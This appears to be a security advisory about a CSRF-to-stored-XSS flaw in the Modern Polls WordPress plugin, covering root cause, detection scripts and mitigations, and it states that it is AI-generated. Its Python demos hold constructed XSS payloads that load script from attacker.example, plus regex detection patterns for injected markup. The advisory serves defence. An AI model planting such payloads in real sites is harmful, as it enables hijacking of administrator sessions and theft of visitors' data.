CVE-2025-46466 Overview
CVE-2025-46466 is a Cross-Site Request Forgery (CSRF) vulnerability in the Modern Polls plugin for WordPress, developed by felixtz. The missing CSRF protection can be chained with Stored Cross-Site Scripting (XSS): an attacker with no account on the site crafts a request that creates or edits poll content containing script, and gets a logged-in administrator (or another user allowed to manage polls) to submit it unknowingly by visiting an attacker-controlled page. The injected script is then stored by the plugin and executes in the browser of every subsequent visitor who views the affected poll.
Impact
Because the injected script runs with the privileges of whoever views the poll, an attacker who pulls this off can act as an administrator inside that administrator's browser session (for example, create accounts or change settings through the admin interface), deface pages, redirect visitors to phishing sites, or harvest data entered on the site. WordPress authentication cookies are HttpOnly, so outright session-cookie theft is not the usual outcome; the script acts through the victim's browser instead.
Affected Products
- WordPress Modern Polls plugin, version 1.0.10 and all earlier versions
- Any WordPress site on which a vulnerable version of the plugin is installed and active; the WordPress core version is not a factor
Discovery Timeline
- 2025-04-24 - CVE-2025-46466 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-46466
Vulnerability Analysis
This vulnerability combines two weaknesses: Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS). The Modern Polls plugin does not validate an anti-CSRF token (in WordPress terms, a nonce issued by wp_nonce_field() or wp_create_nonce() and checked with check_admin_referer() or wp_verify_nonce()) on its state-changing poll management requests. Any page the administrator's browser loads can therefore submit such a request, the browser attaches the administrator's authentication cookies to it, and the plugin treats the forged request as a legitimate administrative action.
The attack requires user interaction: the victim must be logged in with rights to manage polls (typically an administrator) and must open a page the attacker controls, for example via a link in an e-mail or a post. Once the forged request has been accepted, the XSS payload sits in the database as poll content and is served on every later page load, affecting every user who views the compromised poll, including other administrators.
In CVSS terms, confidentiality, integrity and availability are each rated Low, and Scope is Changed: the vulnerable component is the plugin, but the injected script executes in visitors' browsers within the origin of the whole WordPress site, so the impact is not confined to the plugin.
Root Cause
The root cause is the absence of anti-CSRF token (nonce) verification in the plugin's administrative functions, combined with insufficient output encoding when poll data is rendered. The plugin neither verifies that a state-changing request was submitted from its own interface (a nonce tied to the user, the action and a time window, as WordPress's check_admin_referer() provides), nor escapes stored values with functions such as esc_html() before printing them, so markup an administrator was tricked into saving is echoed back as live HTML.
Attack Vector
The attack is network-based and requires user interaction. The attacker prepares a web page (or an HTML e-mail that links to one) containing a hidden, auto-submitting form or a script that sends a request to the vulnerable Modern Polls endpoint. When an authenticated WordPress administrator opens that page, the browser sends the forged request together with the administrator's session cookies, and the request reaches the site from the administrator's own IP address. The malicious poll content is stored in the database, and the embedded script executes whenever the affected poll is rendered.
No privileges on the target site are required (CVSS Privileges Required: None): the attacker never logs in and relies entirely on the victim's existing authenticated session. Two caveats apply. First, WordPress does not set a SameSite attribute on its authentication cookies unless the site configures one, and Chromium-based browsers treat such cookies as Lax by default, which withholds them on cross-site POST requests (apart from a short window after the cookie is set) but still sends them on top-level GET navigations; whether a given browser attaches the cookies therefore depends on the HTTP method the vulnerable handler accepts, and this browser behaviour is no substitute for a nonce check. Second, because the forged request is issued by the administrator's own browser, network controls such as IP allow-listing on wp-admin do not stop it.
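The two defects described above, a handler that trusts the session cookie alone and a renderer that echoes stored data unencoded, can be shown next to their fixed forms with a small model of a poll-save handler. The following Python is an added example written for this page; it is not code from the Modern Polls plugin, and the handler, field and store names (save_poll_vulnerable, save_poll_fixed, the demo_save_poll nonce action, the poll_id and question fields, the site https://polls.example and the secret) are assumed for illustration. The nonce follows the construction WordPress uses in wp_create_nonce() and wp_verify_nonce() (a keyed hash over a 12-hour tick, the action, the user ID and the session token, with the previous tick still accepted), and the fixed handler additionally rejects requests whose Origin or Referer names another site, as a second layer on top of the nonce. The forged request carries the administrator's session but no nonce and a foreign Origin, which is exactly what a CSRF page produces:

```python
import hashlib
import hmac
import html
import math
import time
from urllib.parse import urlparse

# Constructed values for the demo; the secret is not a real key.
SITE_ORIGIN = "https://polls.example"
NONCE_SECRET = b"demo-secret-do-not-reuse"
NONCE_LIFE = 12 * 60 * 60          # WordPress ticks nonces every DAY_IN_SECONDS / 2


def _nonce_for_tick(tick, action, user_id, session_token):
    # Same shape as wp_create_nonce(): keyed hash of tick|action|uid|session, 10 hex chars.
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.md5).hexdigest()[-12:-2]


def nonce_tick(now=None):
    return math.ceil((time.time() if now is None else now) / NONCE_LIFE)


def create_nonce(action, user_id, session_token, now=None):
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now=None):
    """1 = current tick, 2 = previous tick (still accepted), 0 = invalid, as wp_verify_nonce()."""
    if not isinstance(nonce, str) or not nonce.isascii():
        return 0
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        if hmac.compare_digest(nonce, _nonce_for_tick(t, action, user_id, session_token)):
            return age
    return 0


def same_origin(headers):
    """Origin (or Referer when Origin is absent) must be our own site; neither present -> reject."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


# A request is modelled as {"headers": {...}, "form": {...}, "user": {"id", "session"} or None}.

def save_poll_vulnerable(request, store):
    """Models the defect: a logged-in session is the only check, so a forged request passes."""
    if request["user"] is None:
        return 403, "login required"
    store[request["form"]["poll_id"]] = request["form"]["question"]
    return 200, "saved"


def render_poll_vulnerable(store, poll_id):
    return f"<h2>{store[poll_id]}</h2>"          # stored value echoed without encoding


def save_poll_fixed(request, store):
    """Hardened: login, same-origin header check, then a per-user, per-action nonce."""
    user = request["user"]
    if user is None:
        return 403, "login required"
    if not same_origin(request["headers"]):
        return 403, "cross-site request rejected"
    nonce = request["form"].get("_wpnonce", "")
    if not verify_nonce(nonce, "demo_save_poll", user["id"], user["session"]):
        return 403, "nonce check failed"
    store[request["form"]["poll_id"]] = request["form"]["question"]
    return 200, "saved"


def render_poll_fixed(store, poll_id):
    return f"<h2>{html.escape(store[poll_id], quote=True)}</h2>"   # output encoded


def demo():
    admin = {"id": 1, "session": "sess-4f2a"}
    payload = '<script src="https://attacker.example/p.js"></script>'   # constructed payload
    # Form auto-submitted from the attacker's page: the browser attaches the admin's cookies,
    # the Origin header names the attacker's site, and there is no nonce.
    forged = {"headers": {"Origin": "https://attacker.example"},
              "form": {"poll_id": "7", "question": payload}, "user": admin}
    legit = {"headers": {"Origin": SITE_ORIGIN},
             "form": {"poll_id": "7", "question": "Favourite editor?",
                      "_wpnonce": create_nonce("demo_save_poll", 1, "sess-4f2a")},
             "user": admin}
    vuln, fixed = {}, {}
    return {
        "vulnerable_forged": save_poll_vulnerable(forged, vuln)[0],
        "vulnerable_render": render_poll_vulnerable(vuln, "7"),
        "fixed_forged": save_poll_fixed(forged, fixed)[0],
        "fixed_legit": save_poll_fixed(legit, fixed)[0],
        "fixed_render": render_poll_fixed(fixed, "7"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run directly, the vulnerable handler accepts the forged save and echoes the raw script tag, while the fixed handler rejects the forged request, accepts the legitimate one and renders the stored text entity-encoded. In a real plugin the equivalent calls are wp_nonce_field() in the form, check_admin_referer() or wp_verify_nonce() in the handler, and esc_html() or wp_kses_post() on output.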
Detection Methods for CVE-2025-46466
Indicators of Compromise
- Script tags, inline event handlers (onerror=, onload=, and similar), javascript: URLs or unexpected iframes in poll question, answer or description fields, whether stored raw or entity-encoded
- Requests from visitors' browsers to unknown third-party domains when poll pages load, visible in CSP violation reports or browser developer tools; the server itself does not make these requests
- Poll modifications at times when no administrator was working in the dashboard, or recorded alongside a Referer from an external site
- If a Content Security Policy is deployed, CSP violation reports or browser console errors triggered when polls are viewed
Detection Strategies
- Query the plugin's database tables and options for script tags, event-handler attributes and javascript: URLs, checking both raw and entity-encoded forms, since a payload may be stored encoded and decoded on output
- Monitor HTTP access logs for POST requests to the plugin's administrative endpoints (under /wp-admin/, including admin-post.php and admin-ajax.php) whose Referer or Origin header names a host other than the site; the source IP will be the administrator's own, so do not filter on it
- Deploy a Content-Security-Policy, initially in Report-Only mode with a report-to or report-uri directive, so that inline or third-party script execution on poll pages is reported before it is blocked
- Deploy web application firewall rules that match XSS payload patterns in POST bodies, bearing in mind that a WAF inspects the request body and cannot tell a forged request from a legitimate one carrying the same cookies
Monitoring Recommendations
- Enable detailed logging of WordPress administrative actions (an activity-log plugin, or the web server's access log with the Referer field recorded)
- Alert on changes to poll content outside normal administrative workflows, for example a save with no matching admin page view from the same session shortly before it
- Collect CSP violation reports from poll pages to catch script execution from stored content, rather than relying on someone noticing it while browsing
- Use file integrity monitoring on plugin and core files; it will not detect the injected poll content, which lives in the database, but it does catch follow-on tampering by an attacker who has gained administrative control
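The two sources of evidence above, stored poll content and the web server access log, can be checked with the following Python, which is an added example for this page and not a tool shipped with WordPress or the plugin. The table and field names in the sample rows, the hostname polls.example and the log lines are constructed for the demo (the plugin's real table layout was not checked; adapt the SELECT that feeds scan_poll_rows to it). The log parser expects Apache combined format, which records the Referer but not the Origin header; it flags state-changing requests under /wp-admin/ with a foreign Referer as high and those with no Referer as low, since referrer policies and private browsing also strip it. Note in the sample that the forged request arrives from the same IP as the administrator's legitimate one:

```python
import html
import re
from urllib.parse import urlparse

SITE_HOST = "polls.example"   # assumed hostname of the site being monitored

# Markup that has no business in a poll question or answer. Order matters: the first
# matching label is the one reported.
SUSPICIOUS_MARKUP = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"<\s*(iframe|object|embed|svg|img|math)\b", re.I), "embedding tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URI"),
]


def classify_markup(value):
    """Label of the first suspicious construct in value, or None.
    Checked as stored and after one round of entity decoding, because a payload may sit
    in the database encoded and be decoded before rendering. Legitimately escaped text
    is flagged too, so findings are for review, not automatic deletion."""
    for text in (value, html.unescape(value)):
        for pattern, label in SUSPICIOUS_MARKUP:
            if pattern.search(text):
                return label
    return None


def scan_poll_rows(rows):
    """rows: iterable of (table, row_id, field, value) as pulled by a SELECT. One finding per flagged field."""
    findings = []
    for table, row_id, field, value in rows:
        label = classify_markup(value)
        if label is not None:
            findings.append({"table": table, "id": row_id, "field": field, "reason": label})
    return findings


# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def flag_cross_site_admin_writes(log_lines):
    """State-changing requests under /wp-admin/ whose Referer is another host (high) or absent (low)."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] not in ("POST", "PUT", "DELETE"):
            continue
        if not m["path"].startswith("/wp-admin/"):
            continue
        entry = {"ip": m["ip"], "time": m["ts"], "path": m["path"]}
        referer = m["referer"]
        if referer in ("", "-"):
            findings.append({**entry, "severity": "low", "reason": "no Referer on admin write"})
            continue
        host = urlparse(referer).hostname
        if host != SITE_HOST:
            findings.append({**entry, "severity": "high", "reason": f"Referer host {host}"})
    return findings


# Constructed sample data (table names and contents are invented for the demo).
SAMPLE_ROWS = [
    ("polls", 1, "question", "Which release should we ship first?"),
    ("polls", 2, "question", 'Best theme? <img src=x onerror="import(\'https://attacker.example/p.js\')">'),
    ("poll_answers", 9, "answer", "Dark mode"),
    ("poll_answers", 10, "answer", "&lt;script src=&quot;https://attacker.example/p.js&quot;&gt;&lt;/script&gt;"),
    ("poll_answers", 11, "answer", '<a href="JavaScript:void(0)">vote</a>'),
]

SAMPLE_LOG = [
    '198.51.100.7 - - [24/Apr/2025:09:58:01 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://polls.example/wp-admin/admin.php?page=polls" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Apr/2025:10:15:32 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://win-a-prize.example/contest.html" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Apr/2025:10:16:00 +0000] "GET /wp-admin/admin.php?page=polls HTTP/1.1" 200 8712 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Apr/2025:10:20:45 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 27 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Apr/2025:10:21:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://polls.example/blog/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_poll_rows(SAMPLE_ROWS):
        print("content:", f)
    for f in flag_cross_site_admin_writes(SAMPLE_LOG):
        print("log:", f)
```

On the sample data the content scan flags three rows (an img with an onerror handler, an entity-encoded script tag, and a javascript: link) and the log scan flags the cross-site POST to admin-post.php and the referer-less POST to admin-ajax.php. The legitimate save from the same administrator IP seconds earlier is not flagged, which is why the Referer, not the client address, is the useful field here.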
How to Mitigate CVE-2025-46466
Immediate Actions Required
- Disable or remove the Modern Polls plugin if it is not essential to site functionality
- Audit existing poll content (questions, answers and any description or HTML fields) for injected scripts or suspicious markup, in both raw and entity-encoded form
- Clear any cached pages (page cache, object cache and CDN) that may still serve stored XSS payloads after the database has been cleaned
- Review administrator activity and access logs for poll edits with an external Referer header or at unexpected times
Patch Information
No patch has been confirmed for this vulnerability at the time of writing. The issue affects Modern Polls version 1.0.10 and all earlier versions, and there is not yet a fixed version to upgrade to. Administrators should monitor the Patchstack Vulnerability Report for CVE-2025-46466 and the plugin's changelog, and treat a release newer than 1.0.10 as a fix only once Patchstack or the changelog confirms it addresses this issue.
Workarounds
- Remove the Modern Polls plugin entirely until a security patch is available; deactivating it stops its content from being rendered, but an already-injected payload stays in the database until removed
- Implement a Web Application Firewall (WAF) with CSRF and XSS protection rules; this reduces exposure to known payload patterns but cannot reliably distinguish a forged request from a legitimate one, since both carry the administrator's cookies
- Restrict administrative access to trusted IP addresses; this does not prevent CSRF, because the forged request comes from the administrator's own browser and IP, but it limits who can reach the admin area at all
- Add Content-Security-Policy headers to limit what an injected script can do, for example by disallowing inline script and script from third-party hosts
- Ensure administrators do not browse untrusted websites while logged into WordPress, log out when finished, and ideally use a separate browser profile for site administration
# Add Content-Security-Policy header in .htaccess as a defense-in-depth measure.
# This policy disallows inline script and script from other origins, which blocks a
# typical injected payload, but it will also break WordPress admin pages and any theme
# or plugin that relies on inline script. Roll it out as
# Content-Security-Policy-Report-Only first and switch to enforcing once reports are clean.
<IfModule mod_headers.c>
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';"
</IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


